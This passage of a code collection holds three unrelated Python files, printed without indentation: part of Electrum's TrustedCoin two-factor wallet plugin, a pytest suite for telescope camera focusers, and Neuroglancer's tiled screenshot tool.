rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
child_node = rootnode.subkey_at_private_derivation(derivation)
return child_node.to_xprv(), child_node.to_xpub()
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_2fa_seed_type(t):
raise Exception(f'unexpected seed type: {t}')
words = seed.split()
n = len(words)
# old versions used long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif not t == '2fa' or n == 12:
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
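# Example of the split (illustrative): a legacy long 2fa seed of 24 words
# yields xprv1/xpub1 from words 1-12 and xprv2/xpub2 from the remaining words,
# both derived at "m/"; newer short seeds derive both key pairs from the whole
# seed, at "m/0'/" and "m/1'/" respectively.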
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
wizard.terminate()
def create_remote_key(self, email, wizard):
xpub1 = wizard.data['x1/']['xpub']
xpub2 = wizard.data['x2/']['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(repr(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.data['use_trustedcoin'] = True
wizard.terminate()
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.data['x1/']['xpub'] != xpub1 or
wizard.data['x2/']['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
rootnode = BIP32Node.from_xkey(xprv)
key = rootnode.subkey_at_private_derivation((0, 0)).eckey
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, db):
if db.get('wallet_type') != '2fa':
return
if not db.get('x1/'):
return self, 'show_disclaimer'
if not db.get('x2/'):
return self, 'show_disclaimer'
if not db.get('x3/'):
return self, 'accept_terms_of_use'
|
test_focuser.py
|
import time
import pytest
from threading import Thread
from pocs.focuser.simulator import Focuser as SimFocuser
from pocs.focuser.birger import Focuser as BirgerFocuser
from pocs.focuser.focuslynx import Focuser as FocusLynxFocuser
from pocs.camera.simulator import Camera
from pocs.utils.config import load_config
params = [SimFocuser, BirgerFocuser, FocusLynxFocuser]
ids = ['simulator', 'birger', 'focuslynx']
# Ugly hack to access id inside fixture
@pytest.fixture(scope='module', params=zip(params, ids), ids=ids)
def focuser(request):
if request.param[0] == SimFocuser:
# Simulated focuser, just create one and return it
return request.param[0]()
else:
# Load the local config file and look for focuser configurations of the specified type
focuser_configs = []
local_config = load_config('pocs_local', ignore_local=True)
camera_info = local_config.get('cameras')
if camera_info:
# Local config file has a cameras section
camera_configs = camera_info.get('devices')
if camera_configs:
# Local config file camera section has a devices list
for camera_config in camera_configs:
if camera_config:
focuser_config = camera_config.get('focuser', None)
if focuser_config and focuser_config['model'] == request.param[1]:
# Camera config has a focuser section, and it's the right type
focuser_configs.append(focuser_config)
if not focuser_configs:
pytest.skip(
"Found no {} configurations in pocs_local.yaml, skipping tests".format(
request.param[1]))
# Create and return a Focuser based on the first config
return request.param[0](**focuser_configs[0])
@pytest.fixture(scope='module')
def tolerance(focuser):
"""
Tolerance for confirming focuser has moved to the requested position. The Birger may be
1 or 2 encoder steps off.
"""
if isinstance(focuser, SimFocuser):
return 0
elif isinstance(focuser, BirgerFocuser):
return 2
elif isinstance(focuser, FocusLynxFocuser):
return 0
def test_init(focuser):
"""
Confirm proper init & exercise some of the property getters
"""
assert focuser.is_connected
# Expect UID to be a string (or integer?) of non-zero length? Just assert it's truthy
assert focuser.uid
def test_move_to(focuser, tolerance):
focuser.move_to(100)
assert focuser.position == pytest.approx(100, abs=tolerance)
def test_move_by(focuser, tolerance):
focuser.move_to(100)
previous_position = focuser.position
increment = -13
focuser.move_by(increment)
assert focuser.position == pytest.approx((previous_position + increment), abs=tolerance)
def test_is_ready(focuser):
move_thread = Thread(target=focuser.move_by, args=[13])
assert not focuser.is_moving
assert focuser.is_ready
move_thread.start()
time.sleep(0.01)
assert focuser.is_moving
assert not focuser.is_ready
move_thread.join()
assert not focuser.is_moving
assert focuser.is_ready
def test_position_setter(focuser, tolerance):
"""
Can assign to position property as an alternative to move_to() method
"""
focuser.position = 75
assert focuser.position == pytest.approx(75, abs=tolerance)
def test_move_below_min_position(focuser, tolerance):
focuser.move_to(focuser.min_position - 100)
assert focuser.position == pytest.approx(focuser.min_position, abs=tolerance)
def test_move_above_max_position(focuser, tolerance):
focuser.move_to(focuser.max_position + 100)
assert focuser.position == pytest.approx(focuser.max_position, abs=tolerance)
def test_camera_association(focuser):
"""
Test association of Focuser with Camera after initialisation (getter, setter)
"""
sim_camera_1 = Camera()
sim_camera_2 = Camera()
# The focuser from the fixture hasn't been associated with a Camera yet, so this should work
focuser.camera = sim_camera_1
assert focuser.camera is sim_camera_1
# Attempting to associate with a second Camera should fail, though.
focuser.camera = sim_camera_2
assert focuser.camera is sim_camera_1
def test_camera_init():
"""
Test focuser init via Camera constructor.
"""
sim_camera = Camera(focuser={'model': 'simulator', 'focus_port': '/dev/ttyFAKE'})
assert isinstance(sim_camera.focuser, SimFocuser)
assert sim_camera.focuser.is_connected
assert sim_camera.focuser.uid
assert sim_camera.focuser.camera is sim_camera
def test_camera_association_on_init():
"""
Test association of Focuser with Camera during Focuser init
"""
sim_camera = Camera()
focuser = SimFocuser(camera=sim_camera)
assert focuser.camera is sim_camera
|
screenshot.py
|
#!/usr/bin/env python
# @license
# Copyright 2020 Google Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for creating screenshots with Neuroglancer.
The Neuroglancer state may be specified either by a URL or by a path to a JSON
state file.
Rendering requires a web browser. By default, a headless chromedriver is
started in the background. It is also possible to use non-headless chromedriver
or a manually-opened browser.
There are several methods by which the screenshot image may be rendered:
1. The state can be rendered directly as a single frame by Neuroglancer. This
is the simplest and fastest method and works for most states.
2. If the output image size exceeds what Neuroglancer/the browser can support
(usually about 4096x4096), tiled rendering can be used. In this case,
Neuroglancer will render the image as multiple tiles which are assembled
automatically into a single image. This is enabled automatically if the
requested image size exceeds the specified tile dimensions. All normal
functionality is supported, except for the "show_slices" option whereby
cross-section panels are also shown in the 3-d view. Manually-specified
cross sections via the "cross_sections" property are supported, however.
3. If a very large number of 3-d objects are to be rendered, it may be
impossible for Neuroglancer to render them all simultaneously due to memory
limits. The `--segment-shard-size` option may be specified to enable a
special rendering mode in which subsets of the objects are rendered
independently and then combined together into a single image. Depth
information is used to combine the images together. Currently, transparent
rendering of objects is not supported, though. As the final image is
produced incrementally, the state is saved in a `.npz` file, which allows
resuming if the screenshot process is interrupted. To avoid resuming if you
change options, delete the `.npz` file.
Tips:
- The Neuroglancer UI controls are not shown, and in the case of multi-panel
layouts, there is no border between panels. In most cases it is desirable to
capture a single-panel layout.
- The layer side panel and statistics panel, if open, will be closed for the
screenshot.
- The specified image dimensions will be used, rather than the dimensions of
your browser window. This, in combination with the removal of the normal
Neuroglancer UI controls, means that the field of view may differ somewhat.
- The axis lines and volume bounding boxes will be shown if they are enabled in
the Neuroglancer state. If you don't want them in the screenshot, you should
disable them in the Neuroglancer state. You may also use the
`--hide-axis-lines` and `--hide-default-annotations` options. In most cases
it is desirable to hide the axis lines and default annotations.
- The scale bars will be shown if they are enabled in the Neuroglancer state.
If you specify a large image size, you may want to increase the size of the
scale bar, using the `--scale-bar-scale` option.
"""
import argparse
import collections
import contextlib
import copy
import datetime
import itertools
import numbers
import os
import threading
import time
from typing import NamedTuple, Tuple, Callable, Iterator, List, Optional
import PIL
import numpy as np
import neuroglancer
import neuroglancer.cli
import neuroglancer.webdriver
def _get_total_segments(state):
num_segments = 0
for layer in state.layers:
if not isinstance(layer.layer, neuroglancer.SegmentationLayer):
continue
num_segments += len(layer.segments)
return num_segments
def _should_shard_segments(state, segment_shard_size):
return _get_total_segments(state) > segment_shard_size
def _calculate_num_shards(state, segment_shard_size):
total_segments = _get_total_segments(state)
return -(-total_segments // segment_shard_size)
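# (-(-a // b) is the integer ceiling-division idiom used throughout this file)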
def _get_sharded_states(state, segment_shard_size, reverse_bits):
if reverse_bits:
sort_key = lambda x: int('{:064b}'.format(x)[::-1], 2)
else:
sort_key = None
num_shards = _calculate_num_shards(state, segment_shard_size)
for shard_i in range(num_shards):
new_state = copy.deepcopy(state)
cum_retained = 0
cum_skipped = segment_shard_size * shard_i
for i, layer in enumerate(new_state.layers):
if not isinstance(layer.layer, neuroglancer.SegmentationLayer):
continue
segments = sorted(layer.segments, key=sort_key)
num_to_skip = min(cum_skipped, len(segments))
segments = segments[num_to_skip:]
cum_skipped += num_to_skip
num_to_retain = min(segment_shard_size - cum_retained, len(segments))
cum_retained += num_to_retain
layer.segments = set(segments[:num_to_retain])
yield new_state
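# Sharding example (illustrative): with segment_shard_size=1000 and 2500
# selected segments spread over the segmentation layers, three shard states
# are yielded covering segments 0-999, 1000-1999 and 2000-2499 in the chosen
# sort order; each shard is rendered separately and later composited by depth.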
class TileGenerator:
def __init__(self, shape, tile_shape):
self.tile_shape = tuple(tile_shape)
self.shape = tuple(shape)
self.tile_grid_shape = tuple(-(-self.shape[i] // self.tile_shape[i]) for i in range(2))
self.tile_shape = tuple(-(-self.shape[i] // self.tile_grid_shape[i]) for i in range(2))
self.num_tiles = self.tile_grid_shape[0] * self.tile_grid_shape[1]
def get_tile_states(self, state):
for tile_y in range(self.tile_grid_shape[1]):
for tile_x in range(self.tile_grid_shape[0]):
x_offset = tile_x * self.tile_shape[0]
y_offset = tile_y * self.tile_shape[1]
tile_width = min(self.tile_shape[0], self.shape[0] - x_offset)
tile_height = min(self.tile_shape[1], self.shape[1] - y_offset)
new_state = copy.deepcopy(state)
new_state.partial_viewport = [
x_offset / self.shape[0], y_offset / self.shape[1], tile_width / self.shape[0],
tile_height / self.shape[1]
]
params = {
'tile_x': tile_x,
'tile_y': tile_y,
'x_offset': x_offset,
'y_offset': y_offset,
'tile_width': tile_width,
'tile_height': tile_height,
}
yield params, new_state
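# Tiling example (illustrative): shape=(10000, 6000) with tile_shape=(4096, 4096)
# gives tile_grid_shape=(3, 2); the tile shape is then rebalanced to
# (ceil(10000/3), ceil(6000/2)) = (3334, 3000), so num_tiles == 6 and each tile
# state covers its sub-rectangle via partial_viewport.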
class ShardedTileGenerator(TileGenerator):
def __init__(self, state, segment_shard_size, reverse_bits, **kwargs):
super(ShardedTileGenerator, self).__init__(**kwargs)
self.state = state
self.reverse_bits = reverse_bits
self.total_segments = _get_total_segments(self.state)
self.segment_shard_size = segment_shard_size
self.num_shards = _calculate_num_shards(self.state, self.segment_shard_size)
self.num_tiles *= self.num_shards
def get_states(self):
for shard_i, state in enumerate(
_get_sharded_states(self.state,
self.segment_shard_size,
reverse_bits=self.reverse_bits)):
for params, state in self.get_tile_states(state):
params['segment_shard'] = shard_i
yield params, state
class CaptureScreenshotRequest(NamedTuple):
state: neuroglancer.ViewerState
description: str
config_callback: Callable[[neuroglancer.viewer_config_state.ConfigState], None]
response_callback: neuroglancer.viewer_config_state.ScreenshotReply
include_depth: bool = False
def buffered_iterator(base_iter, lock, buffer_size):
while True:
with lock:
buffered_items = list(itertools.islice(base_iter, buffer_size))
if not buffered_items: break
for item in buffered_items:
yield item
def capture_screenshots(viewer: neuroglancer.Viewer,
request_iter: Iterator[CaptureScreenshotRequest],
refresh_browser_callback: Callable[[], None],
refresh_browser_timeout: int,
num_to_prefetch: int = 1) -> None:
prefetch_buffer = list(itertools.islice(request_iter, num_to_prefetch + 1))
while prefetch_buffer:
with viewer.config_state.txn() as s:
s.show_ui_controls = False
s.show_panel_borders = False
del s.prefetch[:]
for i, request in enumerate(prefetch_buffer[1:]):
s.prefetch.append(
neuroglancer.PrefetchState(state=request.state, priority=num_to_prefetch - i))
request = prefetch_buffer[0]
request.config_callback(s)
viewer.set_state(request.state)
print('%s [%s] Requesting screenshot' % (
datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f'),
request.description,
))
last_statistics_time = time.time()
def statistics_callback(statistics):
nonlocal last_statistics_time
last_statistics_time = time.time()
total = statistics.total
print(
'%s [%s] Screenshot in progress: %6d/%6d chunks loaded (%10d bytes), %3d downloading'
% (
datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f'),
request.description,
total.visible_chunks_gpu_memory,
total.visible_chunks_total,
total.visible_gpu_memory,
total.visible_chunks_downloading,
))
event = threading.Event()
screenshot = None
def result_callback(s):
nonlocal screenshot
screenshot = s.screenshot
event.set()
viewer.async_screenshot(
result_callback,
include_depth=request.include_depth,
statistics_callback=statistics_callback,
)
def get_timeout():
return max(0, last_statistics_time + refresh_browser_timeout - time.time())
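# Wait for the screenshot reply; if no statistics update has arrived within
# refresh_browser_timeout seconds, assume the browser hung, ask the caller to
# refresh it via refresh_browser_callback, then keep waiting.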
while True:
if event.wait(get_timeout()):
break
if get_timeout() > 0:
continue
last_statistics_time = time.time()
refresh_browser_callback()
request.response_callback(screenshot)
del prefetch_buffer[0]
next_request = next(request_iter, None)
if next_request is not None:
prefetch_buffer.append(next_request)
def capture_screenshots_in_parallel(viewers: List[Tuple[neuroglancer.Viewer, Callable[[], None]]],
request_iter: Iterator[CaptureScreenshotRequest],
refresh_browser_timeout: numbers.Number, num_to_prefetch: int,
total_requests: Optional[int] = None,
buffer_size: Optional[int] = None):
if buffer_size is None:
if total_requests is None:
copy_of_requests = list(request_iter)
total_requests = len(copy_of_requests)
request_iter = iter(copy_of_requests)
buffer_size = max(1, total_requests // (len(viewers) * 4))
request_iter = iter(request_iter)
threads = []
buffer_lock = threading.Lock()
for viewer, refresh_browser_callback in viewers:
def capture_func(viewer, refresh_browser_callback):
viewer_request_iter = buffered_iterator(base_iter=request_iter,
lock=buffer_lock,
buffer_size=buffer_size)
capture_screenshots(
viewer=viewer,
request_iter=viewer_request_iter,
num_to_prefetch=num_to_prefetch,
refresh_browser_timeout=refresh_browser_timeout,
refresh_browser_callback=refresh_browser_callback,
)
t = threading.Thread(target=capture_func, args=(viewer, refresh_browser_callback))
t.start()
threads.append(t)
for t in threads:
t.join()
class MultiCapturer:
def __init__(self,
shape,
include_depth,
output,
config_callback,
num_to_prefetch,
checkpoint_interval=60):
self.include_depth = include_depth
self.checkpoint_interval = checkpoint_interval
self.config_callback = config_callback
self.num_to_prefetch = num_to_prefetch
self.output = output
self._processed = set()
self.state_file = output + '.npz'
self.temp_state_file = self.state_file + '.tmp'
self.image_array = np.zeros((shape[1], shape[0], 4), dtype=np.uint8)
if self.include_depth:
self.depth_array = np.zeros((shape[1], shape[0]), dtype=np.float32)
self._load_state()
self._add_image_lock = threading.Lock()
self._last_save_time = time.time()
self._save_state_in_progress = threading.Event()
self._save_state_in_progress.set()
self._num_states_processed = 0
self._start_time = time.time()
def _load_state(self):
if not os.path.exists(self.state_file):
return
with np.load(self.state_file, allow_pickle=True) as f:
if self.include_depth:
self.depth_array = f['depth']
self.image_array = f['image']
self._processed = set(f['processed'].ravel()[0])
def _save_state(self, save_image=False):
with self._add_image_lock:
processed = set(self._processed)
with open(self.temp_state_file, 'wb') as f:
save_arrays = {
'image': self.image_array,
'processed': processed,
}
if self.include_depth:
save_arrays['depth'] = self.depth_array
np.savez_compressed(f, **save_arrays)
os.replace(self.temp_state_file, self.state_file)
if save_image:
self._save_image()
def _save_state_async(self, save_image=False):
print('Starting checkpointing')
def func():
try:
self._save_state()
print('Done checkpointing')
finally:
self._save_state_in_progress.set()
threading.Thread(target=func, daemon=True).start()
def _save_image(self):
im = PIL.Image.fromarray(self.image_array)
im.save(self.output)
def _add_image(self, params, screenshot):
with self._add_image_lock:
tile_image = screenshot.image_pixels
tile_selector = np.s_[params['y_offset']:params['y_offset'] + params['tile_height'],
params['x_offset']:params['x_offset'] + params['tile_width']]
if self.include_depth:
tile_depth = screenshot.depth_array
depth_array_part = self.depth_array[tile_selector]
mask = np.logical_and(np.logical_or(tile_depth != 0, depth_array_part == 0),
tile_depth >= depth_array_part)
depth_array_part[mask] = tile_depth[mask]
else:
mask = Ellipsis
self.image_array[tile_selector][mask] = tile_image[mask]
self._processed.add(self._get_description(params))
self._num_states_processed += 1
elapsed = time.time() - self._start_time
print('%4d tiles rendered in %5d seconds: %.1f seconds/tile' %
(self._num_states_processed, elapsed, elapsed / self._num_states_processed))
def _maybe_save_state(self):
if not self._save_state_in_progress.is_set(): return
with self._add_image_lock:
if self._last_save_time + self.checkpoint_interval < time.time():
self._last_save_time = time.time()
self._save_state_in_progress.clear()
self._save_state_async(save_image=False)
def _get_description(self, params):
segment_shard = params.get('segment_shard')
if segment_shard is not None:
prefix = 'segment_shard=%d ' % (segment_shard, )
else:
prefix = ''
return '%stile_x=%d tile_y=%d' % (prefix, params['tile_x'], params['tile_y'])
def _make_capture_request(self, params, state):
description = self._get_description(params)
if description in self._processed: return None
def config_callback(s):
s.viewer_size = (params['tile_width'], params['tile_height'])
self.config_callback(s)
def response_callback(screenshot):
self._add_image(params, screenshot)
self._maybe_save_state()
return CaptureScreenshotRequest(state=state,
description=self._get_description(params),
config_callback=config_callback,
response_callback=response_callback,
include_depth=self.include_depth)
def _get_capture_screenshot_request_iter(self, state_iter):
for params, state in state_iter:
request = self._make_capture_request(params, state)
if request is not None: yield request
def capture(self, viewers, state_iter, refresh_browser_timeout: int, save_depth: bool, total_requests: int):
capture_screenshots_in_parallel(
viewers=viewers,
request_iter=self._get_capture_screenshot_request_iter(state_iter),
refresh_browser_timeout=refresh_browser_timeout,
num_to_prefetch=self.num_to_prefetch,
total_requests=total_requests)
if not self._save_state_in_progress.is_set():
print('Waiting for previous save state to complete')
self._save_state_in_progress.wait()
if save_depth:
self._save_state()
else:
self._save_image()
if os.path.exists(self.state_file):
os.remove(self.state_file)
def capture_image(viewers, args, state):
def config_callback(s):
s.scale_bar_options.scale_factor = args.scale_bar_scale
segment_shard_size = args.segment_shard_size
tile_parameters = dict(
shape=(args.width, args.height),
tile_shape=(args.tile_width, args.tile_height),
)
if segment_shard_size is not None and _should_shard_segments(state, segment_shard_size):
gen = ShardedTileGenerator(state=state,
segment_shard_size=segment_shard_size,
reverse_bits=args.sort_segments_by_reversed_bits,
**tile_parameters)
num_states = gen.num_tiles
state_iter = gen.get_states()
include_depth = True
else:
gen = TileGenerator(**tile_parameters)
num_states = gen.num_tiles
state_iter = gen.get_tile_states(state)
include_depth = False
capturer = MultiCapturer(
shape=tile_parameters['shape'],
include_depth=include_depth,
output=args.output,
config_callback=config_callback,
num_to_prefetch=args.prefetch,
checkpoint_interval=args.checkpoint_interval,
)
num_output_shards = args.num_output_shards
tiles_per_output_shard = args.tiles_per_output_shard
output_shard = args.output_shard
if (output_shard is None) != (num_output_shards is None and tiles_per_output_shard is None):
raise ValueError(
'--output-shard must be specified in combination with --num-output-shards or --tiles-per-output-shard'
)
if output_shard is not None:
if num_output_shards is not None:
if num_output_shards < 1:
raise ValueError('Invalid --num-output-shards: %d' % (num_output_shards, ))
states_per_shard = -(-num_states // num_output_shards)
else:
if tiles_per_output_shard < 1:
raise ValueError('Invalid --tiles-per-output-shard: %d' %
(tiles_per_output_shard, ))
num_output_shards = -(-num_states // tiles_per_output_shard)
states_per_shard = tiles_per_output_shard
if output_shard < 0 or output_shard >= num_output_shards:
raise ValueError('Invalid --output-shard: %d' % (output_shard, ))
print('Total states: %d, Number of output shards: %d' % (num_states, num_output_shards))
state_iter = itertools.islice(state_iter, states_per_shard * output_shard,
states_per_shard * (output_shard + 1))
else:
states_per_shard = num_states
capturer.capture(
viewers=viewers,
state_iter=state_iter,
refresh_browser_timeout=args.refresh_browser_timeout,
save_depth=output_shard is not None,
total_requests=states_per_shard,
)
def define_state_modification_args(ap: argparse.ArgumentParser):
ap.add_argument('--hide-axis-lines',
dest='show_axis_lines',
action='store_false',
help='Override showAxisLines setting in state.')
ap.add_argument('--hide-default-annotations',
action='store_false',
dest='show_default_annotations',
help='Override showDefaultAnnotations setting in state.')
ap.add_argument('--projection-scale-multiplier',
type=float,
help='Multiply projection view scale by specified factor.')
ap.add_argument('--system-memory-limit',
type=int,
default=3 * 1024 * 1024 * 1024,
help='System memory limit')
ap.add_argument('--gpu-memory-limit',
type=int,
default=3 * 1024 * 1024 * 1024,
help='GPU memory limit')
ap.add_argument('--concurrent-downloads', type=int, default=32, help='Concurrent downloads')
ap.add_argument('--layout', type=str, help='Override layout setting in state.')
ap.add_argument('--cross-section-background-color',
type=str,
help='Background color for cross sections.')
ap.add_argument('--scale-bar-scale', type=float, help='Scale factor for scale bar', default=1)
def apply_state_modifications(state: neuroglancer.ViewerState, args: argparse.Namespace):
state.selected_layer.visible = False
state.statistics.visible = False
if args.layout is not None:
state.layout = args.layout
if args.show_axis_lines is not None:
state.show_axis_lines = args.show_axis_lines
if args.show_default_annotations is not None:
state.show_default_annotations = args.show_default_annotations
if args.projection_scale_multiplier is not None:
state.projection_scale *= args.projection_scale_multiplier
if args.cross_section_background_color is not None:
state.cross_section_background_color = args.cross_section_background_color
state.gpu_memory_limit = args.gpu_memory_limit
state.system_memory_limit = args.system_memory_limit
state.concurrent_downloads = args.concurrent_downloads
def define_viewer_args(ap: argparse.ArgumentParser):
ap.add_argument('--browser', choices=['chrome', 'firefox'], default='chrome')
ap.add_argument('--no-webdriver',
action='store_true',
help='Do not open browser automatically via webdriver.')
ap.add_argument('--no-headless',
dest='headless',
action='store_false',
help='Use non-headless webdriver.')
ap.add_argument('--docker-chromedriver',
action='store_true',
help='Run Chromedriver with options suitable for running inside docker')
ap.add_argument('--debug-chromedriver',
action='store_true',
help='Enable debug logging in Chromedriver')
ap.add_argument('--jobs',
'-j',
type=int,
default=1,
help='Number of browsers to use concurrently. '
'This may improve performance at the cost of greater memory usage. '
'On a 64GiB 16 hyperthread machine, --jobs=6 works well.')
def define_size_args(ap: argparse.ArgumentParser):
ap.add_argument('--width', type=int, default=3840, help='Width in pixels of image.')
ap.add_argument('--height', type=int, default=2160, help='Height in pixels of image.')
def define_tile_args(ap: argparse.ArgumentParser):
ap.add_argument(
'--tile-width',
type=int,
default=4096,
help=
'Width in pixels of single tile. If total width is larger, the screenshot will be captured as multiple tiles.'
)
ap.add_argument(
'--tile-height',
type=int,
default=4096,
help=
'Height in pixels of single tile. If total height is larger, the screenshot will be captured as multiple tiles.'
)
ap.add_argument('--segment-shard-size',
type=int,
help='Maximum number of segments to render simultaneously. '
'If the number of selected segments exceeds this number, '
'multiple passes will be used (transparency not supported).')
ap.add_argument(
'--sort-segments-by-reversed-bits',
action='store_true',
help=
'When --segment-shard-size is also specified, normally segment ids are ordered numerically before being partitioned into shards. If segment ids are spatially correlated, then this can lead to slower and more memory-intensive rendering. If --sort-segments-by-reversed-bits is specified, segment ids are instead ordered by their bit reversed values, which may avoid the spatial correlation.'
)
def define_capture_args(ap: argparse.ArgumentParser):
ap.add_argument('--prefetch', type=int, default=1, help='Number of states to prefetch.')
ap.add_argument(
'--refresh-browser-timeout',
type=int,
default=60,
help=
'Number of seconds without receiving statistics while capturing a screenshot before browser is considered unresponsive.'
)
@contextlib.contextmanager
def get_viewers(args: argparse.Namespace):
if args.no_webdriver:
viewers = [neuroglancer.Viewer() for _ in range(args.jobs)]
print('Open the following URLs to begin rendering')
for viewer in viewers:
print(viewer)
def refresh_browser_callback():
print('Browser unresponsive, consider reloading')
yield [(viewer, refresh_browser_callback) for viewer in viewers]
else:
def _make_webdriver():
webdriver = neuroglancer.webdriver.Webdriver(
headless=args.headless,
docker=args.docker_chromedriver,
debug=args.debug_chromedriver,
browser=args.browser,
)
def refresh_browser_callback():
print('Browser unresponsive, reloading')
webdriver.reload_browser()
return webdriver, refresh_browser_callback
webdrivers = [_make_webdriver() for _ in range(args.jobs)]
try:
yield [(webdriver.viewer, refresh_browser_callback)
for webdriver, refresh_browser_callback in webdrivers]
finally:
for webdriver, _ in webdrivers:
try:
webdriver.__exit__()
except:
pass
def run(args: argparse.Namespace):
neuroglancer.cli.handle_server_arguments(args)
state = args.state
apply_state_modifications(state, args)
with get_viewers(args) as viewers:
capture_image(viewers, args, state)
def main(args=None):
ap = argparse.ArgumentParser()
neuroglancer.cli.add_server_arguments(ap)
neuroglancer.cli.add_state_arguments(ap, required=True)
